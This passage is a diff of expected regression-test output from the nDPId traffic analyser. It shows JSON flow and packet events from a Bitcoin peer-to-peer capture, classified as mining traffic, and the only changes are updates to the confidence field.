waaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":215,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":215,"packets-processed":214,"total-skipped-flows":0,"total-l4-payload-len":260266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1301328538215} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":495,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":495,"packets-processed":494,"total-skipped-flows":0,"total-l4-payload-len":520135,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":5,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1301329138452} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":622,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":622,"packets-processed":621,"total-skipped-flows":0,"total-l4-payload-len":537564,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1301329743430} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 